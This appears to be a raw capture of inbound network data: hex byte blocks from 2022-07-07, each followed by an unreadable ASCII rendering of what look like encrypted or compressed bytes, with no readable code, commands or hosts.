                                                                                                                                                            2022-07-07 07:51:12 UTC2726INData Raw: ef 9c 15 03 21 b8 14 0e 4c 4b 1e b5 9b ec 9d 34 21 78 8e 85 8f 89 72 fb 8d 8b c3 e4 51 f8 1f 55 e5 22 4f 8c 17 05 ec 75 24 48 96 fb 42 ea 75 48 f8 87 87 e3 99 64 fb 24 50 5f e6 3e af 2c 6f 41 a9 92 83 45 9f ff e7 91 2e d7 43 27 e2 62 ac 2c ee 7c c3 5a d3 9f 53 05 6f cd 22 1e 85 f8 2f f9 99 0b aa 29 0e 64 26 02 cf 1f e1 2b 36 2e a9 01 6e b4 40 c1 0d 1d cb 6f fb e4 1a 70 53 92 b3 0d 70 41 2e b8 c0 c2 2d e4 87 70 ab 0c 36 2f 54 77 ef 8a 31 6b a9 95 3f 46 fe 70 a3 9b e6 e8 52 a0 49 26 36 f9 d1 4a 02 12 2f d4 57 a2 52 b6 d3 c0 37 86 58 7b a4 ef bc 66 b9 7b e1 6f ee 98 4b 56 02 74 0d 8e 43 59 81 1d 11 2e bb 96 f1 8c 54 a9 db 9b b4 62 da 63 25 76 8f 33 2c 20 66 6b b6 a1 b6 40 0e 7b b5 0e cd 66 e7 5a f4 15 50 db 96 60 4a 40 e1 da 27 2d 4d 5f be ca af 16 ad f4 9d
                                                                                                                                                            Data Ascii: !LK4!xrQU"Ou$HBuHd$P_>,oAE.C'b,|ZSo"/)d&+6.n@opSpA.-p6/Tw1k?FpRI&6J/WR7X{f{oKVtCY.Tbc%v3, fk@{fZP`J@'-M_
                                                                                                                                                            2022-07-07 07:51:12 UTC2742INData Raw: 37 14 2c 31 3f f5 54 65 59 14 07 e3 ea 69 4c 5a d2 52 59 e8 14 9d 70 98 e7 ad ea ad 29 ec e8 94 7b 19 e0 53 31 6a be ae a9 24 3c 2c c9 10 40 84 6a 68 b2 bc 2b 65 04 39 5d fd 74 37 12 11 c5 75 b7 b6 11 ef ea 88 a1 45 b1 e6 5d 97 ab 29 28 a0 3c 81 88 b0 0b b5 47 e2 6a eb 75 db 3c a4 f2 61 74 f8 02 4d 36 2f 76 cc 5f 6a ed da b7 77 70 2b 0a a9 06 96 3e e6 e5 fe 87 f5 0e 58 c3 b6 f5 8e 6a 8e d0 21 21 ed c9 84 eb f8 23 1c 29 16 b2 77 f4 9e c1 dc 34 10 29 44 66 84 48 5c a1 b1 72 8b 2c 47 71 d4 29 66 4e 65 49 77 b5 83 05 04 b5 31 3f 14 f9 84 5c 9a ca 5c a3 26 f0 59 49 a8 eb 1d c8 03 ec 3c 59 90 77 0c d0 39 bc cc d3 8f 11 3e 01 5b 03 45 a2 4b 96 6d ea aa 34 06 cc 3f 28 4c 29 4b 5c 8e db ef bb 15 1b 6b 31 c3 fe c3 6f d2 1d d3 f6 a9 d9 ac c3 50 42 35 42 bb 20 15 11
                                                                                                                                                            Data Ascii: 7,1?TeYiLZRYp){S1j$<,@jh+e9]t7uE])(<Gju<atM6/v_jwp+>Xj!!#)w4)DfH\r,Gq)fNeIw1?\\&YI<Yw9>[EKm4?(L)K\k1oPB5B
                                                                                                                                                            2022-07-07 07:51:12 UTC2758INData Raw: c5 a0 26 fd 74 5a fc 60 b5 3e cd e4 be b9 87 f6 cd 33 03 0c b6 66 36 25 64 d0 17 a0 0c 75 12 9b 9b 44 13 27 a5 39 c9 0d c1 e4 27 57 2e 1d a2 70 39 cb 48 fa 80 47 f3 a0 fb e8 9c b0 f1 53 50 0c 3e cb 0e 35 e7 48 1f 67 e4 c9 8b 3b f3 c7 82 97 03 b6 ff 24 df 25 a2 3c 0f b9 ef 2e 8b ef 32 ab 58 75 7f 73 f8 c4 26 f8 2a d3 6f 41 88 ae 77 0b 28 37 78 42 57 84 f4 63 45 bb af 8d 7e f5 07 d5 83 fe d7 ae dc e6 4b 9f a9 2d e5 72 18 8d bc 7c 0c 81 fb a4 be 51 2d c5 1d e9 c0 53 be cc e2 61 08 42 45 84 4e d6 4c 76 61 fc c0 6a 76 b9 90 b7 11 6d 07 8c df 36 6f a4 5d 90 4c 8a c6 eb c9 53 65 e0 b5 68 77 02 cf af 62 e0 ce d1 c6 e1 73 30 80 9f 7f ad 63 5f e9 cf 9e e6 53 f3 c5 31 19 8f d6 68 8d 14 3a c9 97 07 e1 5c 6e 22 ff 3f 36 04 32 ab d9 20 4c 58 6b 23 10 56 ad 63 13 7a 85
                                                                                                                                                            Data Ascii: &tZ`>3f6%duD'9'W.p9HGSP>5Hg;$%<.2Xus&*oAw(7xBWcE~K-r|Q-SaBENLvajvm6o]LSehwbs0c_S1h:\n"?62 LXk#Vcz
                                                                                                                                                            2022-07-07 07:51:12 UTC2774INData Raw: 1c 11 75 69 6e 97 5b 92 95 c9 f9 5d 02 45 d4 06 45 f9 70 2c 3f c5 f6 92 09 f8 76 c3 a6 ab 6c c7 d0 03 f0 01 77 32 fc 48 d5 b6 09 9e 33 e9 f4 e7 e3 64 59 41 c5 7f 0d 73 59 3b 06 29 5b 35 91 82 1b 82 1e af 85 6d 2e 08 bd 45 1b 62 5a c0 62 c9 30 29 6c ae ed 19 a3 bc 65 dd 1b b6 14 d1 4d 43 2d 2f 89 f0 c2 c7 5e 8b 00 db dd d4 34 08 36 6d 7c 4b cd af d4 f6 f3 e4 49 53 96 05 36 56 ac a5 26 c4 a8 45 9a c4 07 7f d6 1b f6 9b 9e aa 30 d4 c1 02 15 d2 27 94 e3 26 c8 62 e3 86 70 ca 6f 7b a5 18 03 a0 b0 48 a4 d3 f2 8b 38 b0 ef 34 20 0e 36 f1 35 17 db 31 27 9f ae f7 df 77 af 84 8c d5 3a 4e c6 36 0e b6 23 c7 3e 36 a2 4f 78 91 c1 5b 8d 9a cb 6b e0 4b a7 9f d0 fc 4a 68 3d 22 c4 4d e9 cc 4c 60 35 7f aa b8 6b 9e e8 d1 a0 c0 1c a5 d6 e5 d8 5d c8 d8 84 e2 75 7d be bf b5 d3 b3
                                                                                                                                                            Data Ascii: uin[]EEp,?vlw2H3dYAsY;)[5m.EbZb0)leMC-/^46m|KIS6V&E0'&bpo{H84 651'w:N6#>6Ox[kKJh="ML`5k]u}
                                                                                                                                                            2022-07-07 07:51:12 UTC2790INData Raw: cc 3a 48 f6 f2 4f de 21 e4 d9 37 45 70 bd 89 09 42 21 89 f1 92 18 62 7d d2 3b 69 24 6a f3 39 ee f9 09 c7 d5 bb 45 b4 d5 cf 2b bf 11 14 ab fe f3 0b a4 64 b5 f7 27 1e 69 d2 29 c2 1c 3c 07 ed a5 5a 2a 0f 8d f3 52 b2 d9 7a c6 9d 24 24 c0 24 f2 bb 26 02 37 2d f9 02 50 71 46 f1 c3 0d e4 c8 50 ad f4 c8 df 8c ae e9 bf 0e c9 d6 9a 69 55 ee 18 32 a1 0d 7a fd 01 26 68 27 de 4b 77 6a df 21 78 57 d2 d5 03 13 ce 8d 26 5c 6c 51 3a 42 6b f7 72 a6 1f 36 5b 97 34 10 78 10 e2 58 a8 2a 93 f7 01 d7 f1 b9 1d 21 8e 43 25 0f 39 c5 b7 f1 d0 49 5b 3c 27 cc 86 a7 d7 1b 1f c8 01 fd 8f dd e4 3a e2 5e e3 a1 a9 20 0b ce 04 7b 61 a3 ec 90 82 b2 07 4f 5f 21 74 3d 1f 18 63 c6 db 96 b1 24 c5 a2 b5 b3 0e 5d c4 5c 0c 34 ea 96 b0 b9 ea a1 cd 5f 33 e5 f2 ef 96 c9 c5 87 41 4c 88 95 2f 79 00 b7
                                                                                                                                                            Data Ascii: :HO!7EpB!b};i$j9E+d'i)<Z*Rz$$$&7-PqFPiU2z&h'Kwj!xW&\lQ:Bkr6[4xX*!C%9I[<':^ {aO_!t=c$]\4_3AL/y
                                                                                                                                                            2022-07-07 07:51:12 UTC2806INData Raw: ff cb 3f 76 b2 78 57 6c f5 8f 94 ca 18 20 84 31 12 d1 fb 7a bf f9 3a e8 fe f6 46 e1 58 0e c4 d4 bd d4 3e 53 9a 46 56 8a a8 b1 c5 02 a8 31 d0 0a 8d bc 77 e4 ed bc f1 59 bc f0 4e 4d 5d a7 e0 3f 7a 2f c4 f5 99 8c 28 e5 b1 c9 de 55 c5 7d 5f d6 b5 67 10 48 13 c5 f1 63 d2 79 5d b3 49 df 15 8b 71 7b 87 a5 d6 d6 9f 0a e0 7b e4 f0 21 55 51 67 31 a5 f4 fc 70 fd de fa dc 16 eb 0f d8 51 bc 8e 13 d0 8f 3c 06 7d 01 f9 9d 0a 2d 45 a1 2f f8 9d 77 17 d7 16 2b 7f c1 a8 a6 57 b2 b7 56 d6 8f 7a 55 1f c9 06 68 5a 04 3e c5 b7 f5 35 69 81 a7 34 de d5 4b a2 f5 bb e6 1e cf 33 e5 a0 7c 0b 64 94 83 c4 ea 14 b9 a3 8d a9 e5 aa b3 a1 91 9f 2f 07 f8 ff d9 cf 7e 53 4c 45 64 f3 d4 25 22 9c 5c 26 35 b5 79 19 05 2f 85 f9 0b 02 f7 92 8b da e7 58 49 c6 aa 82 39 57 77 28 b6 c4 ca c0 fc 74 a8
                                                                                                                                                            Data Ascii: ?vxWl 1z:FX>SFV1wYNM]?z/(U}_gHcy]Iq{{!UQg1pQ<}-E/w+WVzUhZ>5i4K3|d/~SLEd%"\&5y/XI9Ww(t
                                                                                                                                                            2022-07-07 07:51:12 UTC2822INData Raw: c7 dc 9a 9f 33 38 2a ba 63 d5 68 ed 51 4f 91 5f 6b 00 d2 c3 ff 88 e9 c5 56 7b d5 ef ab d9 b7 4f f3 d0 ff 50 95 ad b0 60 70 6c a6 4f 66 92 3f 5d 07 c6 64 d4 45 a6 d0 c7 e2 57 8f 8a b4 18 ad 36 06 d8 07 44 6e 35 fd 5d 80 a4 16 97 c1 0a 4e 5d 41 80 a1 c7 d5 3d c5 f0 35 eb 0c 9e 17 79 e8 9b 39 cf 81 c9 a9 da f8 42 e7 66 eb ea 2a 90 52 ea 8c 38 43 75 22 e5 4b 9f 17 6e 77 ef 4d 09 f3 b8 dd d1 70 58 fa bb 5f 21 7d c8 4f cf 00 71 21 48 cc 81 e1 55 8d 82 12 63 c1 f7 f5 dd 20 f4 f9 71 48 86 d8 d8 b3 6c 8c 9c 49 a6 b8 37 9a f0 b2 d3 9a 4b ac e6 5b 52 98 f5 d1 8e 9d d7 b4 cf 89 42 b2 d8 03 bf 11 31 10 a2 7e 6c c9 ab cf 14 b0 f0 2c 95 95 6d a4 c2 40 62 93 55 da 44 3c 3b 98 ca c8 55 0b d9 da 8a 20 46 f2 33 08 aa f8 40 95 87 c8 9a d9 c6 24 d1 1a f4 72 5b 25 2d 5d 68 8a
                                                                                                                                                            Data Ascii: 38*chQO_kV{OP`plOf?]dEW6Dn5]N]A=5y9Bf*R8Cu"KnwMpX_!}Oq!HUc qHlI7K[RB1~l,m@bUD<;U F3@$r[%-]h
                                                                                                                                                            2022-07-07 07:51:12 UTC2838INData Raw: 54 2a ce b7 15 9f 87 f7 b9 15 7e 3e bc 60 64 71 57 63 9c b2 2e bd 23 3a e9 95 a2 1b dc 87 df d1 08 13 82 7d 77 2d 5b f4 80 2f 72 2e bc 57 9d a4 3e 28 28 19 77 48 18 08 ac ac 65 6b 49 72 cd cd f1 6c 0a 61 18 12 ed e0 51 f6 8e 2f bf 05 9c 1e 5a d3 78 13 63 53 2e 11 eb 78 b4 b5 60 63 9c 80 cb 6a d8 a4 7e 52 99 6e 89 75 54 af a2 da c0 d6 23 84 13 5b 7a 9b 6e 63 cf e5 73 dd 5a 3c c4 bd 27 30 f9 f9 f9 52 3b c8 f2 86 6f 92 d8 c2 8c 89 fe ed ea 84 58 55 c5 95 25 a8 f4 5e d4 c5 4f 69 fb 27 c6 f7 8b 6a bb 2d 3e e3 34 98 17 23 77 c6 7e 39 65 74 ad 0f 19 66 31 c0 16 4b 0d 2b 4c bd 6e b4 d1 6c 42 b2 16 1b 63 ff 65 dc 79 d1 fd a7 50 fa 0f 05 a6 dd 69 a5 a5 fe 02 d6 3a c4 39 de 9e ef c3 1f 2b b0 69 e4 e3 8b aa 09 fb 9a 83 79 0c d5 bc 2e ee 44 5a 48 83 88 96 bc eb 43 ab
                                                                                                                                                            Data Ascii: T*~>`dqWc.#:}w-[/r.W>((wHekIrlaQ/ZxcS.x`cj~RnuT#[zncsZ<'0R;oXU%^Oi'j->4#w~9etf1K+LnlBceyPi:9+iy.DZHC
                                                                                                                                                            2022-07-07 07:51:12 UTC2854INData Raw: b7 62 85 db 49 56 5a bf 6e ad 2d a8 cb 11 aa b3 8f 93 2a be 1c 46 54 6e 2f 30 86 e4 c9 99 ca f1 f3 3a 02 b9 a8 68 f5 7c 0b 8e 26 30 8d c3 0c 8e ef 4b 49 a3 38 82 89 1f 4b 3b 3d d9 70 7a b3 bf d9 ce 69 88 01 da 7d dc 7c 5b e2 3a 34 b2 f0 66 03 82 fa 95 24 0d 88 9e 85 f7 17 0e 1d 80 cc 7c 8a 8f f7 be 9b ea 19 89 0d 33 d5 84 21 1e 95 bd c2 e9 55 31 e8 57 12 93 b9 f9 4d 82 7d 3b a4 e8 1c 22 7b c8 79 7c ce 77 46 e4 8a 44 56 b1 93 f3 34 e5 35 e6 26 00 9a 93 ad 11 79 72 72 a2 e6 43 9d 7b 69 e2 3a 49 77 db c8 b2 30 6e 37 e6 6d c5 ff ed 19 45 ef 48 61 17 c3 f4 66 10 30 a2 7a d0 5a 62 c4 dc 62 90 f1 ca d3 68 e1 5e d3 e1 5b f9 c9 4e 8f 6b 55 d6 a7 ba cf c3 7a f5 e5 04 81 0c 7c ff e6 ee 3e 3b eb ed d3 e0 d5 4f 57 f0 46 45 84 b2 ed d3 90 f1 86 79 ac 46 05 d5 cc 8a 4c
                                                                                                                                                            Data Ascii: bIVZn-*FTn/0:h|&0KI8K;=pzi}|[:4f$|3!U1WM};"{y|wFDV45&yrrC{i:Iw0n7mEHaf0zZbbh^[NkUz|>;OWFEyFL
                                                                                                                                                            2022-07-07 07:51:12 UTC2870INData Raw: fa 5d 96 07 c9 1a 97 0e ce 3c 55 3a 2d 74 e8 70 41 56 68 87 f5 c0 fd 02 e6 d9 a4 6a f6 9e 2f d7 d6 bb b5 6f 3b ec db 5b 39 96 ae 36 a2 b7 ce c1 54 0c 88 d3 8f 29 b3 7b cd 58 d3 33 7f b5 bc b3 bf 7f 0c cd cd d9 82 9b 97 a7 cf 2d 1e b2 10 64 58 84 84 58 92 8c 29 ad 0b 15 cb 2e 9a fb 99 bc 26 4c b8 0d 8e c1 20 ac 93 7f b1 b6 5d 94 6b 8a b3 5d af 91 40 8c d3 d2 ec b1 9d 38 d6 98 0f fc 1e 52 45 a2 5b 08 20 3f 6e ea db d3 13 7f f6 e4 b7 a6 6e b8 19 21 5d 7b c2 c1 71 e0 4a 0f 99 a9 50 71 f2 b8 b9 c3 54 69 80 24 49 36 7f ad 64 94 b7 4d 94 d5 56 a4 1f f4 ba dc 32 b5 6a 58 15 4d 91 21 4d 35 22 81 0b 28 de 6e 55 49 8f 1f e8 27 3f ce 62 b7 bd 24 90 2b 3f 00 b3 c9 ef 44 8f db 52 b0 50 4a 33 28 e9 bb 8a 19 4f 25 68 5f c3 a4 39 13 15 4c 7f af a0 73 33 ec d5 7c 55 e2 00
                                                                                                                                                            Data Ascii: ]<U:-tpAVhj/o;[96T){X3-dXX).&L ]k]@8RE[ ?nn!]{qJPqTi$I6dMV2jXM!M5"(nUI'?b$+?DRPJ3(O%h_9Ls3|U
                                                                                                                                                            2022-07-07 07:51:12 UTC2886INData Raw: f5 87 c9 a8 dd 57 1e 73 45 6f 6e 28 c8 2b 92 29 fb 91 df 98 98 62 88 10 19 3b 80 d9 c4 76 e2 3e 93 cc 9e 43 da e6 ec 0f 5e 82 1d 82 e5 32 a6 6a a1 35 e2 22 c0 76 69 8f 38 27 75 92 bc 28 39 ab b2 a7 a2 f3 7e 12 6d c6 ee 1a cc 50 b8 2d e1 72 3d 9c 2f d8 93 ca 0d a2 f2 b7 0a 1c 70 0f 9a d7 44 54 30 97 20 53 c1 ab c2 98 09 c8 ed 7d a7 25 73 50 f1 a9 fa 24 bc eb d3 f3 b9 ce 81 4d bf 99 a9 09 83 72 08 92 a5 8e f1 9b 08 6e 47 9a 64 7e 0c 09 a1 81 65 fc 13 99 ab 9a bf bc 63 de a0 b4 54 e7 bc 5c b8 5f 70 8e 57 91 ff 8b b3 44 a6 e9 c3 b4 b5 93 04 eb b6 67 f9 59 b8 46 d9 ae a1 a4 58 2b 3a fc af 2d 39 94 cc 20 13 a4 31 bd 5a 92 1f 65 80 52 73 b1 9c 23 87 9a ee a1 bf 3b f2 f5 b6 a2 66 ea 1f 8d 0b 0d d0 cf 97 4c 51 69 6e db 08 95 90 74 bc 0d bd a5 05 22 90 ae 69 01 ed
                                                                                                                                                            Data Ascii: WsEon(+)b;v>C^2j5"vi8'u(9~mP-r=/pDT0 S}%sP$MrnGd~ecT\_pWDgYFX+:-9 1ZeRs#;fLQint"i
                                                                                                                                                            2022-07-07 07:51:12 UTC2902INData Raw: 98 78 83 ed 00 8e ea 85 0d 75 3d 9c 84 61 91 b0 8c 9e f6 8c ef 9d 8e 08 e6 25 bf 3b 11 3b 25 72 58 df a9 9e c9 7a a5 08 d5 64 50 33 8a c3 4f 5b 2c a2 67 e5 7d 7d a5 35 18 68 f3 55 9f f6 ef 2e ca f5 bd fa cb d3 78 d0 6f 5a 54 d5 c1 8b b6 9b 47 1b 29 47 76 c7 e7 3b 96 1a 39 86 99 35 69 6b f6 19 36 75 ef 4f f5 44 64 dc 5c 6b ce b2 83 c1 fd 74 05 af f3 3f 57 63 b7 fe 39 cd 2b ea 53 6a 91 48 44 70 d2 db 22 65 1b 67 00 bb 00 e1 86 1d a0 f2 ff 82 b9 5e c7 23 75 65 87 9e 95 32 4f 5e fd 7d 68 e3 89 c8 73 83 3c 8d ff 07 62 63 8a ba b2 21 67 8a a5 44 ea 17 42 16 0c e1 d4 12 b1 0c 9a 66 66 d9 6b 33 60 66 07 e7 ea a2 f4 67 24 8c f4 4b d8 0b a2 ca 7d 9a a3 ae 7a 71 c5 82 7c 9e cf a8 33 67 df 34 b2 b9 fb af 50 ab 8f 9f c3 f1 23 1e 02 51 86 76 b0 a0 bc 7e da 92 47 e2 d7
                                                                                                                                                            Data Ascii: xu=a%;;%rXzdP3O[,g}}5hU.xoZTG)Gv;95ik6uODd\kt?Wc9+SjHDp"eg^#ue2O^}hs<bc!gDBffk3`fg$K}zq|3g4P#Qv~G
                                                                                                                                                            2022-07-07 07:51:12 UTC2918INData Raw: e6 67 ed ef 8a 36 8b 17 e3 9c c0 d4 de f9 ac f2 aa b9 4f 6a 75 7f 09 ca 44 42 43 bc 02 1e 2f ca 9a 7e 86 23 c5 24 13 4d bc 3a ef 08 41 13 9b cc 1c 47 99 8b ca 1d 96 95 61 fc 82 31 f8 c1 bf cc 0a 12 cc 06 b7 2b 6d 32 02 fc 4d 8e 74 b7 84 32 5e 76 dc 37 50 bf d7 b9 f8 25 f0 aa c5 a7 71 bb bc f0 49 91 6b 12 46 e9 9f f3 61 89 b1 1e 19 48 a8 ff 8a 2a 46 18 bc 1b a3 c3 6a 91 ee 0b 46 a0 e4 94 ec 90 dd 4c 9a 2f 65 c0 6f 75 7a 51 f6 5c c8 b9 0b 7f 51 37 78 40 2f 15 cf b4 65 09 4c d5 5a ff 63 3a be a6 02 67 23 29 0e 32 00 25 10 be 59 c6 b6 60 60 4a 33 7b d6 a9 07 46 79 b0 df ec 3d 24 cb 78 48 b2 45 7b e6 0f b1 c0 49 cb 18 c4 52 85 62 1f 57 65 f1 3c b6 4c f7 c7 b3 78 be dd 7c 2b 20 db 7d e3 a9 80 8e 14 f4 7c ce a7 08 f2 c1 1d 2d 0e 05 78 67 d8 91 d9 ab 26 d5 46 96
                                                                                                                                                            Data Ascii: g6OjuDBC/~#$M:AGa1+m2Mt2^v7P%qIkFaH*FjFL/eouzQ\Q7x@/eLZc:g#)2%Y``J3{Fy=$xHE{IRbWe<Lx|+ }|-xg&F
                                                                                                                                                            2022-07-07 07:51:12 UTC2934INData Raw: 70 28 b5 09 89 55 b0 6b d9 d3 99 03 07 2b 0e f7 d1 c8 c8 b1 4f 51 cc 81 22 21 26 54 f2 e8 8f 3a bd 50 db 4e 8d 87 29 64 b6 fc f4 81 df 3e ed 1f 13 a2 51 fc 8e ab 31 17 4a 2b c7 cd 1f 6f cf c5 d6 94 ac 70 61 f5 14 2a 66 0a 71 6d 6c 7b 25 87 64 0f fb b2 6e 57 a6 35 bf b3 aa e6 07 86 34 f0 12 fa 0a 7e ab cc 4b 8e 7d db 04 95 1c e4 4c ab 2d bd 33 2f d2 d6 84 0b b0 30 19 6c 00 90 88 be 26 97 80 e8 37 22 64 3b 45 be 9c 8b a9 40 b1 74 74 d4 d6 85 58 b0 ef 8a 7f 8a 0c bc 30 39 f7 10 7e ad 42 d5 72 04 d8 a7 a6 20 30 a2 26 26 f0 40 ea d7 a5 9a 04 ed 6d 62 7d f3 e5 f4 89 4e 49 2c e1 1d b9 23 bb 01 7b fb 33 d6 ee e0 d9 b5 89 94 cd 6d c3 3a fd 7f 29 5a c3 63 26 9c e9 06 cc 9a ed c1 73 76 a8 2f 91 4a 19 f1 f7 13 53 c9 56 d9 ef 9c a6 a0 1d b1 28 52 77 54 b0 69 db 6b 4d
                                                                                                                                                            Data Ascii: p(Uk+OQ"!&T:PN)d>Q1J+opa*fqml{%dnW54~K}L-3/0l&7"d;E@ttX09~Br 0&&@mb}NI,#{3m:)Zc&sv/JSV(RwTikM
                                                                                                                                                            2022-07-07 07:51:12 UTC2950INData Raw: d0 7a f7 6f dd 25 31 8c 8a 54 a3 23 b2 57 a8 76 da 67 79 ab 87 fb c7 0d 44 d0 63 1a 2d eb 19 e2 0e fb 89 52 9f 4b 67 8e 6c cb 0f c3 64 3b f6 2a ae 1b d0 d8 b9 6d 4c b7 25 14 4a 01 d2 54 e9 15 d3 43 67 1e 0b e3 39 48 30 1c 93 10 99 94 23 28 79 4e 59 27 13 e9 ac 7f c5 b8 78 da be d3 b4 bc b7 18 8a e5 c9 a8 c4 c6 0c 02 b9 9d b4 10 28 5d 63 12 6c 00 f5 1b 89 f3 a4 c2 81 be b9 2a 35 be bf 77 e3 95 fe 02 2b 1b 6d bd ea af 8f bf 3d 10 4f ca b2 ee 52 f7 5e 60 09 1f fc d5 ca 68 c1 87 25 98 85 fe 41 f5 b5 e5 6d 78 0f 58 69 ff 5e dc 35 2f e7 92 8b d6 3f 6c 7c be 75 cd 26 d4 83 31 64 b9 10 76 a4 e4 87 13 d7 b3 cc f2 6c 2b a3 f1 99 48 48 bf f8 04 0a a4 9d 5f d3 aa ed 8a 0d 08 c7 b9 d6 57 03 bc 80 49 78 64 b5 72 51 35 44 f2 11 93 e4 b9 83 14 5c 8d dd 2e ba 73 95 a7 85
                                                                                                                                                            Data Ascii: zo%1T#WvgyDc-RKgld;*mL%JTCg9H0#(yNY'x(]cl*5w+m=OR^`h%AmxXi^5/?l|u&1dvl+HH_WIxdrQ5D\.s
                                                                                                                                                            2022-07-07 07:51:12 UTC2966INData Raw: 46 26 55 32 d4 41 d0 8b 7a 7f 96 b8 c7 02 a5 d9 84 9c 95 68 68 2b ef 39 df e6 79 ca de 7f 16 17 94 c8 cc cb 3c e4 83 02 02 2d ea 1d 95 3a 19 0a d1 24 bd 21 05 a8 42 30 d3 e3 0b c9 2d 34 69 9a 0a a9 30 68 5f ac ee ad a3 c6 1e 42 2c 54 85 a7 36 6e 9c ca b4 5f 95 24 54 47 69 e4 85 aa f4 c2 9f f1 0b 1e 52 47 20 40 02 4e 2f 57 0a 1a 32 97 a6 92 8e 31 2f 10 a2 70 ea d5 f9 59 20 db 7e 3d 80 07 cb 64 bb a3 bb 89 2a 18 8c 84 ad b4 78 74 f2 8c 8a 61 04 6e aa 4f 82 50 35 81 5d 9f a1 d2 93 7c 79 ca a9 20 aa dc 5c b5 ea e5 fd c9 3d 53 f5 cd 0f e6 5e 73 94 b8 ce 30 16 48 b6 d0 40 05 b9 36 89 f8 d7 dd 99 bb 07 0b 6f 60 40 49 5c e5 d5 88 35 78 b8 28 9a ba bb 86 ee bd 93 c3 a3 c4 2f ff f2 39 2c 5d 59 0d 4c 5c 76 ca c8 39 7f 80 65 93 89 4f f9 c1 2a 51 58 0f 8f a5 64 06 64
                                                                                                                                                            Data Ascii: F&U2Azhh+9y<-:$!B0-4i0h_B,T6n_$TGiRG @N/W21/pY ~=d*xtanOP5]|y \=S^s0H@6o`@I\5x(/9,]YL\v9eO*QXdd
                                                                                                                                                            2022-07-07 07:51:12 UTC2982INData Raw: 3c fd b0 ce 09 9f c5 10 a6 47 e9 41 a0 06 6f 48 3c 95 fb a4 dd 92 b6 df 91 8f c6 0b 8f d0 f5 c0 2b 85 4d 5f ea fd 4c 88 79 02 d7 b5 b3 22 c1 ce 36 68 aa 22 e2 3f 7a 11 b2 af 5c d1 ca 1d 5b 2d 8e 21 23 e8 ec b5 6e 60 ee 61 86 2d 38 7f 7e 9f 1c 9d ef 5b c4 17 8d 51 8a c8 5a be 9b 59 88 80 fa 37 b9 24 a4 40 76 25 28 b9 11 12 19 59 6c 70 9d 0b 2b 92 4d 4d 36 2a fc a9 a5 88 72 a5 b2 44 76 bd c9 1c d5 54 1a 17 b1 e3 be 9b de d2 dd 52 4d 65 6c 25 8a ef 03 b2 cd a3 d7 44 23 aa ee 4e 86 13 e5 7f 6f 38 0a d9 ce 98 ae a4 07 08 91 80 28 0f 1e 1e 07 4a e4 b2 80 7a 58 a3 a6 11 78 0c 9b c2 78 33 36 34 a8 21 86 65 42 23 8a 35 fe e0 92 ac 11 83 ff e5 13 1f 58 a5 bd a5 1a 9c c8 42 54 d1 46 a0 9c 0f d4 f3 b2 7f ff 58 0b c1 50 20 b8 14 3e 6a 4f 63 9c 94 f8 65 b5 97 a6 94 b0
                                                                                                                                                            Data Ascii: <GAoH<+M_Ly"6h"?z\[-!#n`a-8~[QZY7$@v%(Ylp+MM6*rDvTRMel%D#No8(JzXxx364!eB#5XBTFXP >jOce
                                                                                                                                                            2022-07-07 07:51:12 UTC2998INData Raw: 62 b4 99 74 91 db 32 37 a2 0c d2 2f 62 7d a8 6d a3 f2 d1 d7 e1 d5 d5 24 9a c5 1a 65 f4 a3 c3 a9 b3 85 6b cc 6b cc 6f f8 45 26 8b c2 b3 36 42 7b 14 9b 94 65 35 ef ad 29 89 0a db ca b6 6e b4 0e b5 ac 07 86 49 c5 bb d5 89 fe b6 3a 27 20 c9 e1 0a 6f 12 6e b3 22 a0 87 56 c8 c2 3d 89 5f 8f ad b5 be 8f 49 b7 ba a2 d3 85 82 76 63 75 e6 a3 9e fb f4 0b 5e 72 e5 2f 53 fb ad 7a 57 9f 33 88 1d 1e f4 18 5f c1 cc 35 ce c5 0f 2c d9 17 d0 2b db 3d ff 2a 8b 1d 19 22 27 62 fa 29 ef 4c 55 3a 53 08 10 d7 54 df 77 f3 a4 18 3d ee a2 20 09 8b 16 6c 19 16 ef 19 21 0e 02 22 e5 a4 51 75 a8 8a 14 27 f3 20 2a ea 95 1c 23 93 cd 24 ab 49 cb 2b b9 cd da 58 ce ef e3 c4 96 29 d4 be c0 f0 13 db 44 11 9a a8 2c 71 8f c6 7d 1e 28 f5 ad 90 38 a2 90 57 d3 7f b5 db 4b b6 99 51 40 8a ec bc 9a cd
                                                                                                                                                            Data Ascii: bt27/b}m$ekkoE&6B{e5)nI:' on"V=_Ivcu^r/SzW3_5,+=*"'b)LU:STw= l!"Qu' *#$I+X)D,q}(8WKQ@
                                                                                                                                                            2022-07-07 07:51:12 UTC3014INData Raw: e5 04 9b 27 25 43 d8 18 f5 88 78 41 24 44 bf 4c 11 d4 01 b4 b9 18 9a a6 8c 17 1b 2c 5f ce e6 ea e3 29 50 4e 0c 1c 63 08 6f ba a3 29 31 52 68 33 73 75 65 56 5a 60 77 61 19 02 9a 10 08 c1 49 75 95 00 45 18 dd d1 20 23 37 bb c8 f2 f8 6e 62 5d 80 be 6f 1f be dc 14 7e d3 28 a3 8a 83 14 c7 6d 57 37 f8 01 fc 08 5f 3b bc b6 3b e3 38 0c 61 08 ab e5 e6 e7 18 c8 1f 9f 75 4a 21 eb 86 4e 16 32 4b 3c 83 1f ae ac 4a 67 f0 ce 1b 52 b1 b5 9f b2 fe 04 75 43 7a cb 86 74 c0 83 88 30 a0 60 bc 18 45 e4 a0 fc 99 c8 66 28 ec 7c 11 37 01 4b f5 23 0a 24 41 cf 68 1e 5e 37 ad ee 1f df fc cc 58 4b 6f 21 e9 4b 81 b3 66 66 33 26 c6 b8 c5 ed 60 47 5c 54 a6 c4 0f aa 23 ad 67 81 26 6a 72 9a 38 03 09 41 24 8d e1 a5 b3 9c d0 ad 40 8e 1e bf 23 15 ad 8d 76 47 a4 30 58 ed 47 ed ce d3 fa 8f c6
                                                                                                                                                            Data Ascii: '%CxA$DL,_)PNco)1Rh3sueVZ`waIuE #7nb]o~(mW7_;;8auJ!N2K<JgRuCzt0`Ef(|7K#$Ah^7XKo!Kff3&`G\T#g&jr8A$@#vG0XG
